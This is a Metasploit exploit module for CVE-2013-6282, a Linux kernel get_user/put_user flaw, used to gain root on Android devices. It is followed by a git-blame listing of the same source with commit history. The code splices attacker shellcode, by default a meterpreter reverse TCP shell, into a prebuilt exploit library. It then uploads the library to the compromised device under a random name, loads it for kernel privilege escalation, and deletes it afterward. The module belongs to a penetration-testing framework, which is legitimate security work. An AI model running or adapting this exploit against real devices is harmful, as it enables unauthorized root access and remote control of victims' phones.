modules/exploits/android/local/put_user_vroot.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android get_user/put_user Exploit",
          'Description' => %q{
            This module exploits a missing check in the get_user and put_user API functions
            in the linux kernel before 3.5.5. The missing checks on these functions
            allow an unprivileged user to read and write kernel memory.
            This exploit first reads the kernel memory to identify the commit_creds and
            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
            The exploit was first discovered in the wild in the vroot rooting application.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'fi01', # libget_user_exploit / libput_user_exploit
            'cubeundcube', # kallsyms_in_memory
            'timwr',       # Metasploit module
          ],
          'References' => [
            [ 'CVE', '2013-6282' ],
            [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
            [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
            [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
          ],
          'DisclosureDate' => '2013-09-06',
          'SessionTypes' => [ 'meterpreter' ],
          "Platform" => [ "android", "linux" ],
          'Targets' => [[ 'Automatic', {}]],
          'Payload' => { 'Space' => 2048, },
          'DefaultOptions' => {
            'WfsDelay' => 120,
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
          },
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_loadlib
                stdapi_fs_delete_file
                stdapi_fs_getwd
              ]
            }
          },
        }
      )
    )
  end

  def exploit
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-6282.so")
    exploit_data = File.read(local_file, mode: 'rb')

    space = payload_space
    payload_encoded = payload.encoded

    # Substitute the exploit shellcode with our own
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Local`
			`Rank = ExcellentRanking`

			`include Msf::Post::File`
			`include Msf::Post::Common`

Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`{`
			`'Name' => "Android get_user/put_user Exploit",`
			`'Description' => %q{`
typos 2016-10-18 04:13:42 +08:00			`This module exploits a missing check in the get_user and put_user API functions`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`in the linux kernel before 3.5.5. The missing checks on these functions`
typos 2016-10-18 04:13:42 +08:00			`allow an unprivileged user to read and write kernel memory.`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`This exploit first reads the kernel memory to identify the commit_creds and`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.`
			`The exploit was first discovered in the wild in the vroot rooting application.`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'fi01', # libget_user_exploit / libput_user_exploit`
			`'cubeundcube', # kallsyms_in_memory`
			`'timwr', # Metasploit module`
			`],`
			`'References' => [`
			`[ 'CVE', '2013-6282' ],`
fix URLs not resolving 2022-01-23 15:28:32 -05:00			`[ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`[ 'URL', 'https://github.com/fi01/libget_user_exploit' ],`
fix URLs not resolving 2022-01-23 15:28:32 -05:00			`[ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`],`
			`'DisclosureDate' => '2013-09-06',`
			`'SessionTypes' => [ 'meterpreter' ],`
			`"Platform" => [ "android", "linux" ],`
			`'Targets' => [[ 'Automatic', {}]],`
			`'Payload' => { 'Space' => 2048, },`
			`'DefaultOptions' => {`
			`'WfsDelay' => 120,`
			`'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',`
			`},`
			`'DefaultTarget' => 0,`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`core_loadlib`
			`stdapi_fs_delete_file`
			`stdapi_fs_getwd`
			`]`
			`}`
			`},`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`)`
			`)`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`end`

			`def exploit`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-6282.so")`
Specify mode rb on file reads 2022-02-12 21:39:12 +00:00			`exploit_data = File.read(local_file, mode: 'rb')`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00
			`space = payload_space`
			`payload_encoded = payload.encoded`

			`# Substitute the exploit shellcode with our own`
			`exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))`

			`workingdir = session.fs.dir.getwd`
cleanup library after use 2016-10-19 13:08:10 +08:00			`remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`write_file(remote_file, exploit_data)`

			`print_status("Loading exploit library #{remote_file}")`
			`session.core.load_library(`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'LibraryFilePath' => local_file,`
			`'TargetFilePath' => remote_file,`
			`'UploadLibrary' => false,`
			`'Extension' => false,`
			`'SaveToDisk' => false`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`)`
fork early and use WfsDelay 2016-11-16 07:09:58 +00:00			`print_status("Loaded library #{remote_file}, deleting")`
better library cleanup 2016-10-19 13:10:15 +08:00			`session.fs.file.rm(remote_file)`
fork early and use WfsDelay 2016-11-16 07:09:58 +00:00			`print_status("Waiting #{datastore['WfsDelay']} seconds for payload")`
add CVE-2013-6282, put_user/get_user exploit for Android 2016-10-17 20:40:41 +08:00			`end`
			`end`